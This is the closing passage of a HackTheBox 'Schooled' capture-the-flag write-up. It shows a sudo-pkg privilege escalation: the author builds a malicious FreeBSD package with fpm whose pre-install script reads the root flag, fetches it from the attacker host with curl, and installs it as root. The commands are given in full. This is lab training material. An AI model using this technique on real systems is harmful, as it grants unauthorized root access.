
Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

To change this login announcement, see motd(5).
To see the last 10 lines of a long file, use "tail filename". To see the
first 10 lines, use "head filename". To see new lines as they're appended
to a file, use "tail -f filename".
                -- Dru <genesis@istar.ca>
jamie@Schooled:~ $ whoami
jamie
jamie@Schooled:~ $ cat user.txt 
c******************************2


Great. Well, could be a good time for linpeas, but before using a tool like this I want to try to check if I can do something as root without a password.

jamie@Schooled:~ $ sudo -l
User jamie may run the following commands on Schooled:
    (ALL) NOPASSWD: /usr/sbin/pkg update
    (ALL) NOPASSWD: /usr/sbin/pkg install *


Interesting, I can use the pkg command, update and install, too bad I don't have a connection to install packages or even just update the tool. I understand that there may still be some kind of privileges escalation using this command, so I proceed to check if there is anything on GTFOBins and in fact...

pkg | GTFOBins

Ok, good, I check for the fpm command on the remote machine, but I'm not so lucky, anyway, I can install it on my machine, prepare the package and upload it on the remote machine, so I have only to install it and to hope that it works.

Following a guide on how to install fpm.

https://fpm.readthedocs.io/en/latest/installing.html

My payload should be something useful than the id command!

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.234 - Schooled (lin)/attack/fpm]
└─$ TF=$(mktemp -d)
                                                                                                                   
┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.234 - Schooled (lin)/attack/fpm]
└─$ echo 'cat /root/root.txt' > $TF/x.sh
                                                                                                                   
┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.234 - Schooled (lin)/attack/fpm]
└─$ fpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF
DEPRECATION NOTICE: XZ::StreamWriter#close will automatically close the wrapped IO in the future. Use #finish to prevent that.
/var/lib/gems/2.7.0/gems/ruby-xz-0.2.3/lib/xz/stream_writer.rb:185:in `initialize'
        /var/lib/gems/2.7.0/gems/fpm-1.12.0/lib/fpm/package/freebsd.rb:85:in `new'
        /var/lib/gems/2.7.0/gems/fpm-1.12.0/lib/fpm/package/freebsd.rb:85:in `block in output'
        /var/lib/gems/2.7.0/gems/fpm-1.12.0/lib/fpm/package/freebsd.rb:84:in `open'
        /var/lib/gems/2.7.0/gems/fpm-1.12.0/lib/fpm/package/freebsd.rb:84:in `output'
        /var/lib/gems/2.7.0/gems/fpm-1.12.0/lib/fpm/command.rb:487:in `execute'
        /var/lib/gems/2.7.0/gems/clamp-1.0.1/lib/clamp/command.rb:68:in `run'
        /var/lib/gems/2.7.0/gems/fpm-1.12.0/lib/fpm/command.rb:574:in `run'
        /var/lib/gems/2.7.0/gems/clamp-1.0.1/lib/clamp/command.rb:133:in `run'
        /var/lib/gems/2.7.0/gems/fpm-1.12.0/bin/fpm:7:in `<top (required)>'
        /usr/local/bin/fpm:23:in `load'
        /usr/local/bin/fpm:23:in `<main>'
Created package {:path=>"x-1.0.txz"}
                                                                                                                   
┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.234 - Schooled (lin)/attack/fpm]
└─$ ls -la
total 12
drwxr-xr-x 2 in7rud3r in7rud3r 4096 Apr 25 12:41 .
drwxr-xr-x 7 in7rud3r in7rud3r 4096 Apr 25 12:39 ..
-rw-r--r-- 1 in7rud3r in7rud3r  480 Apr 25 12:41 x-1.0.txz


Well done, time to upload the package and install it.

jamie@Schooled:~/temp $ curl http://10.10.15.42:8000/x-1.0.txz -o x-1.0.txz
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   480  100   480    0     0   6315      0 --:--:-- --:--:-- --:--:--  6315
jamie@Schooled:~/temp $ ls -la
total 10
drwxr-xr-x  2 jamie  jamie    3 Apr 25 11:55 .
drwx------  3 jamie  jamie   12 Apr 25 11:53 ..
-rw-r--r--  1 jamie  jamie  480 Apr 25 11:55 x-1.0.txz
jamie@Schooled:~/temp $ sudo pkg install -y --no-repo-update ./x-1.0.txz
pkg: Repository FreeBSD has a wrong packagesite, need to re-create database
pkg: Repository FreeBSD cannot be opened. 'pkg update' required
Checking integrity... done (0 conflicting)
The following 1 package(s) will be affected (of 0 checked):

New packages to be INSTALLED:
        x: 1.0

Number of packages to be installed: 1
[1/1] Installing x-1.0...
c******************************f
Extracting x-1.0: 100%


And that's the root flag. Really a nice BOX. That's all folks, see you at the next write-up. Have a nice day and a nice hacking activity until next BOX.

The awesome image used in today's article is from the 'World's Fastest Iceracer' series by Automotive Photographer Jerome Wassenaar from the Netherlands. Check out his website!